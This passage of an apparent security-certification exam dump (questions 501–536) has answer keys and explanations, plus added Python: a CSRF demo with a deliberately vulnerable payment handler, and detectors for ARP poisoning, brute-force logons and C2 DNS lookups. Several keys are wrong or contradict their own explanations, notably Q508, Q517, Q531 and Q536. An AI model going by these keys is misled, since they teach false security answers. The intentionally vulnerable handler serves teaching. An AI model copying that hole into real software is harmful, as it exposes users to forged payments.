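vulnerable handler changes state on a GET and trusts nothing but the session cookie the browser
attaches automatically; the hardened handler requires POST, checks the Origin/Referer against the
site's own origin, and compares a per-session synchronizer token in constant time. The Request
class, the in-memory session store, the origin https://www.company.com and the attacker domain
attacker.example are assumptions for the demo.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed origin of the application (the question only shows www.company.com in the link).
SITE_ORIGIN = "https://www.company.com"

# Constructed in-memory session store: one logged-in user with a per-session CSRF token.
SESSIONS = {"sess-ann": {"user": "ann", "csrf": secrets.token_urlsafe(32)}}


class Request:
    """Minimal stand-in for a framework request object (hypothetical, for the demo)."""

    def __init__(self, method, path, params=None, form=None, headers=None, cookies=None):
        self.method = method
        self.path = path
        self.params = params or {}   # query string
        self.form = form or {}       # POST body
        self.headers = headers or {}
        self.cookies = cookies or {}


def current_session(req):
    return SESSIONS.get(req.cookies.get("SESSIONID"))


def payto_vulnerable(req):
    """Vulnerable: a GET changes state, and the only authentication is the session cookie,
    which the browser attaches to any request for the site no matter who crafted the URL."""
    sess = current_session(req)
    if sess is None:
        return 401, "login required"
    return 200, f"paid {req.params['amount']} to {req.params['acct']} as {sess['user']}"


def payto_hardened(req):
    """Hardened: POST only, same-origin check, and a synchronizer token bound to the session."""
    sess = current_session(req)
    if sess is None:
        return 401, "login required"
    if req.method != "POST":
        return 405, "state change requires POST"  # the emailed link is a GET
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if origin is None:
        return 403, "missing Origin/Referer"  # browsers send Origin on cross-site POSTs
    u = urlparse(origin)
    if f"{u.scheme}://{u.netloc}" != SITE_ORIGIN:
        return 403, "cross-site request blocked"
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"paid {req.form['amount']} to {req.form['acct']} as {sess['user']}"


def demo():
    """Replays the phishing link, a forged cross-site POST and a legitimate POST; returns statuses."""
    # The link from the question, followed by a victim whose browser attaches the session cookie.
    link = Request("GET", "/payto.do",
                   params={"routing": "00001111", "acct": "22223334", "amount": "250"},
                   cookies={"SESSIONID": "sess-ann"})
    # A forged POST auto-submitted from an attacker-controlled page (hypothetical domain).
    forged_post = Request("POST", "/payto.do",
                          form={"routing": "00001111", "acct": "22223334", "amount": "250",
                                "csrf_token": "guess"},
                          headers={"Origin": "https://attacker.example"},
                          cookies={"SESSIONID": "sess-ann"})
    # The site's own form submission, carrying the per-session token.
    legit_post = Request("POST", "/payto.do",
                         form={"routing": "00001111", "acct": "22223334", "amount": "250",
                               "csrf_token": SESSIONS["sess-ann"]["csrf"]},
                         headers={"Origin": SITE_ORIGIN},
                         cookies={"SESSIONID": "sess-ann"})
    return {
        "vulnerable_link": payto_vulnerable(link)[0],
        "hardened_link": payto_hardened(link)[0],
        "hardened_forged_post": payto_hardened(forged_post)[0],
        "hardened_legit_post": payto_hardened(legit_post)[0],
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

Marking the session cookie SameSite=Lax would not on its own stop the emailed link, because Lax
still sends cookies on top-level GET navigations; it is the refusal to change state on GET,
together with the origin and token checks, that closes the hole.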
QUESTION 501
A network analyst is investigating compromised corporate information. The analyst's working
theory is that network traffic was intercepted before being transmitted to the internet. The
following output was captured on an internal host:
IPv4 Address ............ 10.0.0.87
Subnet Mask ............. 255.255.255.0
Default Gateway ......... 10.0.0.1

Internet Address    Physical Address
10.10.255.255       ff-ff-ff-ff-ff-ff
10.0.0.1            aa-aa-aa-aa-aa-aa
10.0.0.254          aa-aa-aa-aa-aa-aa
224.0.0.2           01-00-5e-00-00-02
Based on the IoCs, which of the following was the most likely attack used to compromise the
network communication?
A. Denial of service
B. ARP poisoning
C. Command injection
D. MAC flooding
Answer: B
Explanation:
ARP poisoning is a type of attack that modifies the ARP cache on a network device. The ARP
cache is a table that stores the IP addresses and MAC addresses of other devices on the
network. When a device needs to send a packet to another device, it looks up the MAC address
of the destination device in its ARP cache. If the MAC address is not in the cache, the device
sends an ARP request to the destination device. The destination device responds to the ARP
request with its MAC address.
In ARP poisoning, the attacker sends spoofed ARP messages to the victim device. The spoofed
ARP messages contain the attacker's MAC address as the source MAC address and the victim's
IP address as the destination IP address. When the victim device receives the spoofed ARP
messages, it updates its ARP cache to associate the attacker's MAC address with the victim's IP
address.
Now, when the victim device needs to send a packet to another device, it will use the attacker's
MAC address as the destination MAC address. The attacker can then intercept the packet and
read or modify its contents.
In the given scenario, the network analyst found that the ARP cache on the internal host was
poisoned. The attacker's MAC address was associated with the victim's IP address. This means
that the attacker was able to intercept network traffic from the victim device.
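The duplicate-MAC check an analyst would script for this, as an added example in Python rather
than code from the page. The sample table is constructed in the layout of Windows `arp -a` with
the values from the question; the regex also accepts other one-line formats that put the IP before
the MAC (Linux `arp -n`, `ip neigh`). Broadcast and multicast entries are skipped by testing the
I/G bit of the MAC, and the finding notes whether the default gateway is among the affected
addresses.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample in the layout of `arp -a` on Windows; values copied from the question.
SAMPLE_ARP = """
Interface: 10.0.0.87 --- 0xb
  Internet Address      Physical Address      Type
  10.10.255.255         ff-ff-ff-ff-ff-ff     static
  10.0.0.1              aa-aa-aa-aa-aa-aa     dynamic
  10.0.0.254            aa-aa-aa-aa-aa-aa     dynamic
  224.0.0.2             01-00-5e-00-00-02     static
"""

# An IPv4 address followed, somewhere on the same line, by a MAC in dash or colon form.
ARP_LINE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})[^\n]*?"
    r"(?P<mac>(?:[0-9A-Fa-f]{2}[-:]){5}[0-9A-Fa-f]{2})"
)


def parse_arp_table(text):
    """Return (ip, mac) pairs with MACs normalised to lower-case dash form."""
    return [(m["ip"], m["mac"].lower().replace(":", "-")) for m in ARP_LINE.finditer(text)]


def is_group_address(mac):
    """True for broadcast/multicast MACs: the I/G bit (low bit of the first octet) is set."""
    return int(mac[:2], 16) & 1 == 1


def find_duplicate_macs(entries, gateway=None):
    """Group unicast IPs by MAC; a MAC claiming more than one IP is an ARP-poisoning indicator."""
    by_mac = defaultdict(list)
    for ip, mac in entries:
        try:
            if is_group_address(mac) or ip_address(ip).is_multicast:
                continue  # ff-ff-ff-ff-ff-ff and 01-00-5e-xx-xx-xx entries are normal
        except ValueError:
            continue  # not a valid IPv4 address; ignore the line
        by_mac[mac].append(ip)
    findings = []
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append({
                "mac": mac,
                "ips": sorted(ips, key=ip_address),
                "gateway_affected": gateway in ips,
            })
    return findings


def demo():
    return find_duplicate_macs(parse_arp_table(SAMPLE_ARP), gateway="10.0.0.1")


if __name__ == "__main__":
    for f in demo():
        suffix = " (includes default gateway)" if f["gateway_affected"] else ""
        print(f"{f['mac']} answers for {', '.join(f['ips'])}{suffix}")
```

A router that legitimately owns several addresses, or a VRRP/HSRP virtual MAC, will also show one
MAC with multiple IPs, so compare the gateway's MAC against a known-good baseline or the switch's
port records before concluding that the segment is being poisoned.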
QUESTION 502
A company's cybersecurity department is looking for a new solution to maintain high availability.
Which of the following can be utilized to build a solution? (Select Two)
A. A stateful inspection
B. IP hashes
C. A round robin
D. A VLAN
E. A DMZ
Answer: BC
Explanation:
Round robin and IP hash are load-balancer scheduling algorithms: they distribute client sessions
across a pool of servers, so the service keeps running when one node fails and can be scaled by
adding nodes. Stateful inspection is a firewall feature, and VLANs and a DMZ are segmentation
constructs; none of them provides high availability on its own.
QUESTION 503
A user's PC was recently infected by malware. The user has a legacy printer without vendor
support, and the user's OS is fully patched. The user downloaded a driver package from the
internet. No threats were found on the downloaded file, but during file installation, a malicious
runtime threat was detected. Which of the following is MOST likely cause of the infection?
A. The driver has malware installed and was refactored upon download to avoid detection.
B. The user's computer has a rootkit installed that has avoided detection until the new
driver overwrote key files.
C. The user's antivirus software definition were out of date and were damaged by the
installation of the driver
D. The user's computer has been infected with a logic bomb set to run when new driver
was installed.
Answer: A
Explanation:
When the user downloaded the driver package from the internet, the malware was already
installed in the driver package. The malware was refactored upon download to avoid detection by
antivirus software. When the user installed the driver, the malware was installed on the user's
computer.
QUESTION 504
Which of the following controls would BEST identify and report malicious insider activities?
A. An intrusion detection system
B. A proxy
C. Audit trails
D. Strong authentication
Answer: C
Explanation:
Audit trails record which authenticated user performed which action on which resource and when,
which is what is needed to identify and report activity by an insider who already has legitimate
access. An IDS looks for intrusion signatures and anomalies in traffic or on hosts and will not
flag an authorized user misusing that access; a proxy and strong authentication are preventive
controls, not detective ones.
QUESTION 505
A security analyst is investigating a phishing email that contains a malicious document directed to
the company's Chief Executive Officer (CEO). Which of the following should the analyst perform
to understand the threat and retrieve possible IoCs?
A. Run a vulnerability scan against the CEO's computer to find possible vulnerabilities
B. Install a sandbox to run the malicious payload in a safe environment
C. Perform a traceroute to identify the communication path
D. Use netstat to check whether communication has been made with a remote host
Answer: B
QUESTION 506
A SOC is currently being outsourced. Which of the following is being used?
A. Microservices
B. SaaS
C. MSSP
D. PaaS
Answer: C
QUESTION 507
A company is considering transitioning to the cloud. The company employs individuals from
various locations around the world. The company does not want to increase its on-premises
infrastructure blueprint and only wants to pay for the additional compute power required. Which of the
following solutions would BEST meet the needs of the company?
A. Private cloud
B. Hybrid environment
C. Managed security service provider
D. Hot backup site
Answer: B
Explanation:
The company does not want to increase its on-premises infrastructure blueprint.
QUESTION 508
An organization recently discovered that a purchasing officer approved an invoice for an amount
that was different than the original purchase order. After further investigation, a security analyst
determines that the digital signature for the fraudulent invoice is exactly the same as the digital
signature for the correct invoice that had been approved. Which of the following attacks MOST
likely explains the behavior?
A. Birthday
B. Rainbow table
C. Impersonation
D. Whaling
Answer: C
Explanation:
In impersonation attacks, attackers trick victims into believing that they are someone else. In this
case, the attackers may have impersonated the vendor who sent the invoice. They may have
sent an email that appeared to be from the vendor, and the email may have contained a
fraudulent invoice with the same digital signature as the original invoice.
QUESTION 509
Which of the following should a technician consider when selecting an encryption method for data
that needs to remain confidential for a specific length of time?
A. The key length of the encryption algorithm
B. The encryption algorithm's longevity
C. A method of introducing entropy into key calculations
D. The computational overhead of calculating the encryption key
Answer: A
Explanation:
The key length is the number of bits used to encrypt the data. The longer the key length, the more
difficult it is for an attacker to crack the encryption. In this case, the technician needs to select an
encryption method that uses a key length that is long enough to keep the data confidential for the
specific length of time required.
QUESTION 510
A security engineer is deploying a new wireless network for a company. The company shares office space
with multiple tenants.
Which of the following should the engineer configure on the wireless network to ensure that
confidential data is not exposed to unauthorized users?
A. EAP
B. TLS
C. HTTPS
D. AES
Answer: D
Explanation:
EAP - Extensible Authentication Protocol (EAP), an authentication framework that provides
general guidance for authentication methods. IEEE 802.1x servers typically use one of these
methods to increase the level of security during the authentication process.
TLS - Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are encryption protocols
that have been commonly used to encrypt data in transit. For example, it is common to encrypt
HTTPS with either SSL or TLS to ensure confidentiality of data transmitted over the Internet.
They can also be used to encrypt other transmissions such as File Transfer Protocol Secure
(FTPS). However, TLS is now a replacement for SSL, as SSL is deprecated and shouldn't be
used.
AES - Advanced Encryption Standard. A strong symmetric block cipher that encrypts data in 128-bit blocks. AES can use key sizes of 128 bits, 192 bits, or 256 bits.
HTTPS - Hypertext Transfer Protocol Secure. A protocol used to encrypt HTTP traffic. HTTPS
encrypts traffic with TLS using TCP port 443.
This question specifically states preventing exposed data to unauthorized users. TLS and HTTPS
only encrypt in-transit data. Data-at-rest in a network is insecure, though.
Only AES meets the criteria of providing confidentiality to both data-at-rest and data-in-transit,
preventing unauthorized users from seeing either.
QUESTION 511
A user's account is constantly being locked out. Upon further review, a security analyst found the
following in the SIEM:
Which of the following describes what is occurring?
A. An attacker is utilizing a password-spraying attack against the account.
B. An attacker is utilizing a dictionary attack against the account.
C. An attacker is utilizing a brute-force attack against the account.
D. An attacker is utilizing a rainbow table attack against the account.
Answer: C
Explanation:
Password spraying is an attack that attempts to access a large number of accounts (usernames)
with a few commonly used passwords. Traditional brute-force attacks attempt to gain
unauthorized access to a single account by guessing the password.
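The distinction the explanation draws (many guesses against one account versus one or two guesses each across many accounts) is something a SIEM rule can score directly. The following is an added example, not part of the original question bank: it parses constructed failed-logon lines (the field layout `auth_fail user=... src=...` is an assumption, since the page's SIEM screenshot is not reproduced) and labels each source address as brute force or password spraying by the shape of its failures.

```python
import re
from collections import defaultdict

# Constructed SIEM-style failed-authentication lines (not from the original page).
# Three sources: one hammering a single account (brute force), one trying one
# guess against many accounts (spraying), and one ordinary mistyped password.
SAMPLE_AUTH_LOG = """\
2024-01-01T10:00:01 auth_fail user=jsmith src=203.0.113.7
2024-01-01T10:00:02 auth_fail user=jsmith src=203.0.113.7
2024-01-01T10:00:03 auth_fail user=jsmith src=203.0.113.7
2024-01-01T10:00:04 auth_fail user=jsmith src=203.0.113.7
2024-01-01T10:00:05 auth_fail user=jsmith src=203.0.113.7
2024-01-01T10:00:06 auth_fail user=jsmith src=203.0.113.7
2024-01-01T10:01:00 auth_fail user=alice src=198.51.100.5
2024-01-01T10:01:01 auth_fail user=bob src=198.51.100.5
2024-01-01T10:01:02 auth_fail user=carol src=198.51.100.5
2024-01-01T10:01:03 auth_fail user=dave src=198.51.100.5
2024-01-01T10:01:04 auth_fail user=erin src=198.51.100.5
2024-01-01T10:02:00 auth_fail user=frank src=192.0.2.9
2024-01-01T10:02:30 auth_ok user=frank src=192.0.2.9
"""

# Assumed line layout; adjust the pattern to the real SIEM's field names.
LINE_RE = re.compile(r"^(?P<ts>\S+) auth_fail user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse_failures(log_text):
    """Return (timestamp, user, source) tuples for failed logons only."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m["ts"], m["user"], m["src"]))
    return events


def classify_sources(events, brute_threshold=5, spray_threshold=5):
    """Label each source IP by the shape of its failures.

    brute_force:       many failures concentrated on a single account
                       (the lockout symptom in the question)
    password_spraying: one or two failures each, spread across many accounts
                       (stays under per-account lockout thresholds)
    """
    per_src = defaultdict(lambda: defaultdict(int))
    for _, user, src in events:
        per_src[src][user] += 1
    verdicts = {}
    for src, users in per_src.items():
        if max(users.values()) >= brute_threshold:
            verdicts[src] = "brute_force"
        elif len(users) >= spray_threshold and max(users.values()) <= 2:
            verdicts[src] = "password_spraying"
        else:
            verdicts[src] = "no_pattern"
    return verdicts


if __name__ == "__main__":
    for src, verdict in sorted(classify_sources(parse_failures(SAMPLE_AUTH_LOG)).items()):
        print(f"{src:<15} {verdict}")
```

Grouping by source address first is what separates the two patterns: a spraying source never trips a per-account counter, so a rule that only counts failures per username (the lockout logic itself) will see the brute-force case and miss the spray.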
QUESTION 512
A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware. Which of the
following deployment models will provide the needed flexibility with the GREATEST amount of
control and security over company data and infrastructure?
A. BYOD
B. VDI
C. COPE
D. CYOD
Answer: D
QUESTION 513
During an asset inventory, several assets, supplies, and miscellaneous items were noted as
missing. The security manager has been asked to find an automated solution to detect any future
theft of equipment. Which of the following would be BEST to implement?
A. Badges
B. Fencing
C. Access control vestibule
D. Lighting
E. Cameras
Answer: C
QUESTION 514
Which of the following environments typically hosts the current version configurations and code,
compares user-story responses and workflow, and uses a modified version of actual data for
testing?
A. Development
B. Staging
C. Production
D. Test
Answer: B
Explanation:
Staging is a testing environment that is used to test changes to code and configurations before
they are deployed to production. The staging environment typically hosts the current version of
the code and configurations, and it uses a modified version of actual data for testing. This allows
testers to compare user-story responses and workflow before the changes are deployed to
production.
QUESTION 515
A company installed several crosscut shredders as part of increased information security
practices targeting data leakage risks. Which of the following will this practice reduce?
A. Dumpster diving
B. Shoulder surfing
C. Information elicitation
D. Credential harvesting
Answer: A
Explanation:
https://cybersecurityforme.com/dumpster-diving-attack/
QUESTION 516
A client sent several inquiries to a project manager about the delinquent delivery status of some
critical reports. The project manager claimed the reports were previously sent via email, but then
quickly generated and backdated the reports before submitting them as plain text within the body
of a new email message thread.
Which of the following actions MOST likely supports an investigation for fraudulent submission?
A. Establish chain of custody.
B. Inspect the file metadata.
C. Reference the data retention policy.
D. Review the email event logs.
Answer: B
QUESTION 517
A new plug-and-play storage device was installed on a PC in the corporate environment.
Which of the following safeguards will BEST help to protect the PC from malicious files on the
storage device?
A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access.
C. Encrypt the disk on the storage device.
D. Plug the storage device into the UPS.
Answer: C
Explanation:
Encrypting the disk on the drive could work because, if the files on the storage drive are encrypted,
the data will be in a format that can't be used by other devices anyway. The PC is in a
corporate environment, so the company is likely using Active Directory, where a GPO can be applied
to encrypt removable drives with BitLocker when they are plugged into a PC.
QUESTION 518
During a security incident investigation, an analyst consults the company's SIEM and sees an
event concerning high traffic to a known, malicious command-and-control server. The analyst
would like to determine the number of company workstations that may be impacted by this issue.
Which of the following can provide the information?
A. WAF logs
B. DNS logs
C. System logs
D. Application logs
Answer: B
Explanation:
DNS logs can contain a record for every query and response. They can show the IP addresses and
domain names that a system should or shouldn't be communicating with, they can reveal malware
calling out to its command-and-control server, and they can expose data transfers to non-company
locations. This is one of the reasons why DNS logs are some of the most valuable logs to import into
a SIEM system.
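To put a number on "how many workstations", the analyst needs the set of distinct clients that resolved the command-and-control name, not the count of queries. The following is an added example, not part of the original question bank: it walks constructed resolver log lines (the `client=... query=...` layout is an assumption) and returns the distinct client addresses that queried an indicator domain or any of its subdomains. The C2 name used is a labelled placeholder, not a real indicator.

```python
import re
from collections import defaultdict

# Constructed DNS resolver log lines (not from the original page). The
# command-and-control domain is a labelled placeholder, not a real indicator.
SAMPLE_DNS_LOG = """\
2024-01-01T02:10:00 client=10.0.0.11 query=updates.example.com. type=A
2024-01-01T02:10:01 client=10.0.0.12 query=c2-placeholder.invalid. type=A
2024-01-01T02:10:05 client=10.0.0.12 query=c2-placeholder.invalid. type=A
2024-01-01T02:11:00 client=10.0.0.13 query=beacon.C2-Placeholder.invalid. type=A
2024-01-01T02:12:00 client=10.0.0.14 query=mail.example.com. type=MX
2024-01-01T02:13:00 client=10.0.0.11 query=notc2-placeholder.invalid. type=A
"""

# In practice the indicators come from the SIEM alert or a threat-intel feed.
C2_DOMAINS = {"c2-placeholder.invalid"}

# Assumed field layout; adjust to the real resolver's log format.
DNS_RE = re.compile(r"client=(?P<client>\S+) query=(?P<qname>\S+)")


def normalize(name):
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return name.lower().rstrip(".")


def matches_indicator(qname, indicator):
    """True for the indicator itself or any subdomain of it. A name that merely
    ends with the same characters (notc2-placeholder.invalid) must not match,
    hence the leading dot in the suffix test."""
    qname, indicator = normalize(qname), normalize(indicator)
    return qname == indicator or qname.endswith("." + indicator)


def clients_by_indicator(log_text, indicators):
    """Map each indicator to the sorted list of distinct clients that resolved it."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = DNS_RE.search(line)
        if not m:
            continue
        for ind in indicators:
            if matches_indicator(m["qname"], ind):
                hits[normalize(ind)].add(m["client"])
    return {ind: sorted(clients) for ind, clients in hits.items()}


def impacted_hosts(log_text, indicators):
    """Distinct client addresses that resolved any indicator: the figure the
    analyst in the question is after."""
    hosts = set()
    for clients in clients_by_indicator(log_text, indicators).values():
        hosts.update(clients)
    return sorted(hosts)


if __name__ == "__main__":
    hosts = impacted_hosts(SAMPLE_DNS_LOG, C2_DOMAINS)
    print(f"{len(hosts)} impacted host(s): {', '.join(hosts)}")
```

The subdomain match matters because beaconing malware commonly encodes data or a host identifier in a label under the C2 domain, so exact-name matching undercounts; the leading-dot check keeps an unrelated name that happens to share a suffix from being counted.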
QUESTION 519
A security analyst reports a company policy violation in a case in which a large amount of
sensitive data is being downloaded after hours from various mobile devices to an external site.
Upon further investigation, the analyst notices that successful login attempts are being conducted
with impossible travel times during the same time periods when the unauthorized downloads are
occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have
non-standard DHCP configurations and an overlapping channel. Which of the following attacks is
being conducted?
A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS
Answer: A
QUESTION 520
Which of the following BEST helps to demonstrate integrity during a forensic investigation?
A. Event logs
B. Encryption
C. Hashing
D. Snapshots
Answer: C
Explanation:
Digital evidence integrity is ensured by calculating MD5 and SHA1 hashes of the extracted
content and storing it in a report along with other details related to the drive. It also offers an
encryption feature to ensure the confidentiality of the digital evidence.
QUESTION 521
Law enforcement officials sent a company a notification that states electronically stored
information and paper documents cannot be destroyed.
Which of the following explains this process?
A. Data breach notification
B. Accountability
C. Legal hold
D. Chain of custody
Answer: C
QUESTION 522
Which of the following is a detective and deterrent control against physical intrusions?
A. A lock
B. An alarm
C. A fence
D. A sign
Answer: B
Explanation:
An alarm is a detective and deterrent control against physical intrusions. It detects an intrusion
and alerts the security personnel or authorities. It also deters intruders from attempting to intrude
because they know that their actions will be detected.
QUESTION 523
A systems analyst determines the source of a high number of connections to a web server that
were initiated by ten different IP addresses that belong to a network block in a specific country.
Which of the following techniques will the systems analyst MOST likely implement to address this
issue?
A. Content filter
B. SIEM
C. Firewall rules
D. DLP
Answer: C
QUESTION 524
A security analyst generated a file named host1.pcap and shared it with a team member who is
going to use it for further incident analysis.
Which of the following tools will the other team member MOST likely use to open this file?
A. Autopsy
B. Memdump
C. FTK imager
D. Wireshark
Answer: D
Explanation:
Some common applications that can open .pcap files are Wireshark, WinDump, tcpdump, Packet
Square - Capedit and Ethereal.
QUESTION 525
Several universities are participating in a collaborative research project and need to share
compute and storage resources. Which of the following cloud deployment strategies would BEST
meet this need?
A. Community
B. Private
C. Public
D. Hybrid
Answer: A
Explanation:
Community cloud storage is a variation of the private cloud storage model, which offers cloud
solutions for specific businesses or communities. In this model, cloud storage providers offer their
cloud architecture, software and other development tools to meet the requirements of the
community. A community cloud in computing is a collaborative effort in which infrastructure is
shared between several organizations from a specific community with common concerns
(security, compliance, jurisdiction, etc.), whether managed internally or by a third-party and
hosted internally or externally.
QUESTION 526
A backdoor was detected on the containerized application environment. The investigation
detected that a zero-day vulnerability was introduced when the latest container image version
was downloaded from a public registry. Which of the following is the BEST solution to prevent this
type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers
C. Define a vulnerability scan to assess container images before they are introduced into the
environment
D. Create a dedicated VPC for the containerized environment
Answer: A
QUESTION 527
A cybersecurity administrator needs to allow mobile BYOD devices to access network resources.
As the devices are not enrolled to the domain and do not have policies applied to them, which of
the following are best practices for authentication and infrastructure security? (Choose two.)
A. Create a new network for the mobile devices and block the communication to the internal network
and servers
B. Use a captive portal for user authentication.
C. Authenticate users using OAuth for more resiliency
D. Implement SSO and allow communication to the internal network
E. Use the existing network and allow communication to the internal network and servers.
F. Use a new and updated RADIUS server to maintain the best solution
Answer: BC
QUESTION 528
A company recently suffered a breach in which an attacker was able to access the internal mail
servers and directly access several user inboxes. A large number of email messages were later
posted online. Which of the following would BEST prevent email contents from being released
should another breach occur?
A. Implement S/MIME to encrypt the emails at rest.
B. Enable full disk encryption on the mail servers.
C. Use digital certificates when accessing email via the web.
D. Configure web traffic to only use TLS-enabled channels.
Answer: A
QUESTION 529
An organization wants to integrate its incident response processes into a workflow with
automated decision points and actions based on predefined playbooks. Which of the following
should the organization implement?
A. SIEM
B. SOAR
C. EDR
D. CASB
Answer: B
Explanation:
Why is SOAR used? To synchronize tools, accelerate response times, reduce alert fatigue, and
compensate for the skill shortage gap. To collaborate with other analysts during investigations. To
analyze workload, organize an analyst's tasks, and allow teams to respond using their own
processes.
EDR
The Endpoint Detection and Response Solutions (EDR) market is defined as solutions that record
and store endpoint-system-level behaviors, use various data analytics techniques to detect
suspicious system behavior, provide contextual information, block malicious activity, and provide
remediation suggestions to restore ...
QUESTION 530
As part of a company's ongoing SOC maturation process, the company wants to implement a
method to share cyberthreat intelligence data with outside security partners. Which of the
following will the company MOST likely implement?
A. TAXII
B. TLP
C. TTP
D. STIX
Answer: A
Explanation:
A TAXII server exchanges standardized and anonymized cyber threat intelligence
among participants. It works as a venue for sharing and collecting indicators of compromise, which
have been anonymized to protect privacy.
QUESTION 531
A security analyst is concerned about critical vulnerabilities that have been detected on some
applications running inside containers. Which of the following is the BEST remediation strategy?
A. Update the base container image and redeploy the environment.
B. Include the containers in the regular patching schedule for servers.
C. Patch each running container individually and test the application.
D. Update the host in which the containers are running.
Answer: C
Explanation:
A container image vulnerability is a security risk that is embedded inside a container image. While
vulnerable images themselves don't pose an active threat, if containers are created based on a
vulnerable image, the containers will introduce the vulnerability to a live environment.
QUESTION 532
A security analyst is investigating multiple hosts that are communicating to external IP addresses
during the hours of 2:00 a.m. - 4:00 a.m. The malware has evaded detection by traditional antivirus
software. Which of the following types of malware is MOST likely infecting the hosts?
A. A RAT
B. Ransomware
C. Logic bomb
D. A worm
Answer: C
QUESTION 533
The Chief Information Security Officer (CISO) has decided to reorganize security staff to
concentrate on incident response and to outsource outbound Internet URL categorization and
filtering to an outside company. Additionally, the CISO would like this solution to provide the same
protections even when a company laptop or mobile device is away from a home office. Which of
the following should the CISO choose?
A. CASB
B. Next-generation SWG
C. NGFW
D. Web-application firewall
Answer: B
Explanation:
Next-Generation SWG
A Next Generation Secure Web Gateway (SWG) is a new cloud-native solution for protecting
enterprises from the growing volume of sophisticated cloud enabled threats and data risks. It is
the logical evolution of the traditional secure web gateway, also known as a web proxy or web
filter.
NGFW
A Next-Generation Firewall (NGFW) is a cyber security solution to protect network fronts with
capabilities that extend beyond traditional firewalls.
Web-application firewall
A WAF protects your web apps by filtering, monitoring, and blocking any malicious HTTP/S traffic
traveling to the web application, and prevents any unauthorized data from leaving the app. It does
this by adhering to a set of policies that help determine what traffic is malicious and what traffic is
safe.
QUESTION 534
A company wants to restrict emailing of PHI documents. The company is implementing a DLP
solution. In order to restrict PHI documents, which of the following should be performed FIRST?
A. Retention
B. Governance
C. Classification
D. Change management
Answer: C
Explanation:
Data has to be first classified for the DLP to know which data can leave the network and which
can't.
Classification assigns a category based on the value of the information to the organization and its
sensitivity if it were to be disclosed.
QUESTION 535
After a WiFi scan of a local office was conducted, an unknown wireless signal was identified.
Upon investigation, an unknown Raspberry Pi device was found connected to an Ethernet port
using a single connection. Which of the following BEST describes the purpose of this device?
A. IoT sensor
B. Evil twin
C. Rogue access point
D. On-path attack
Answer: C
QUESTION 536
A recent security audit revealed that a popular website with IP address 172.16.1.5 also has an
FTP service that employees were using to store sensitive corporate data. The organization's
outbound firewall processes rules top-down. Which of the following would permit HTTP and
HTTPS, while denying all other services for this host?
A. access-rule permit tcp destination 172.16.1.5 port 80
access-rule permit tcp destination 172.16.1.5 port 443
access-rule deny ip destination 172.16.1.5
B. access-rule permit tcp destination 172.16.1.5 port 22
access-rule permit tcp destination 172.16.1.5 port 443
access-rule deny tcp destination 172.16.1.5 port 80
C. access-rule permit tcp destination 172.16.1.5 port 21
access-rule permit tcp destination 172.16.1.5 port 80
access-rule deny ip destination 172.16.1.5
D. access-rule permit tcp destination 172.16.1.5 port 80
access-rule permit tcp destination 172.16.1.5 port 443
access-rule deny tcp destination 172.16.1.5 port 21
Answer: D
Explanation:
The firewall will process the rules top-down. The first two rules permit TCP traffic to destination ports
80 and 443 on host 172.16.1.5. The third rule denies TCP traffic to destination port 21 on
host 172.16.1.5. Any traffic that does not match any of these rules is denied by the implicit deny
at the end of the rule set.
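First-match, top-down evaluation is easy to get wrong in one's head, so the following added example (not part of the original question bank) implements it as a small evaluator over the page's own `access-rule` syntax. It parses the rule lines exactly as written in options A and D, evaluates a few flows against each set with the implicit deny the explanation describes, and then shows what happens when the same lines are reordered with the deny on top. The `access-rule` grammar handled here is only the form that appears in this question; treating it as a general firewall syntax is an assumption.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str            # "permit" or "deny"
    proto: str             # "tcp", "udp", or "ip" (any protocol)
    dst: str               # destination host
    port: Optional[int]    # None matches any destination port


def parse_rule(line):
    """Parse 'access-rule <action> <proto> destination <host> [port N]' as used in the question."""
    parts = line.split()
    if len(parts) < 5 or parts[0] != "access-rule" or parts[3] != "destination":
        raise ValueError(f"unrecognized rule: {line!r}")
    port = int(parts[6]) if len(parts) >= 7 and parts[5] == "port" else None
    return Rule(action=parts[1], proto=parts[2], dst=parts[4], port=port)


def evaluate(rules, proto, dst, port, default="deny"):
    """Top-down first match; traffic matching no rule hits the implicit default."""
    for r in rules:
        if r.dst != dst:
            continue
        if r.proto != "ip" and r.proto != proto:
            continue
        if r.port is not None and r.port != port:
            continue
        return r.action
    return default


# Rule sets exactly as given in options A and D of the question.
OPTION_A = [parse_rule(l) for l in (
    "access-rule permit tcp destination 172.16.1.5 port 80",
    "access-rule permit tcp destination 172.16.1.5 port 443",
    "access-rule deny ip destination 172.16.1.5",
)]
OPTION_D = [parse_rule(l) for l in (
    "access-rule permit tcp destination 172.16.1.5 port 80",
    "access-rule permit tcp destination 172.16.1.5 port 443",
    "access-rule deny tcp destination 172.16.1.5 port 21",
)]


def outcomes(rules, host="172.16.1.5"):
    """Decision for HTTP, HTTPS, FTP and an unrelated service (SSH) to the host."""
    return {
        "http": evaluate(rules, "tcp", host, 80),
        "https": evaluate(rules, "tcp", host, 443),
        "ftp": evaluate(rules, "tcp", host, 21),
        "ssh": evaluate(rules, "tcp", host, 22),
    }


if __name__ == "__main__":
    print("option A:", outcomes(OPTION_A))
    print("option D:", outcomes(OPTION_D))
    # Same three lines as A, deny first: the catch-all matches before the permits.
    print("A reordered:", outcomes(list(reversed(OPTION_A))))
```

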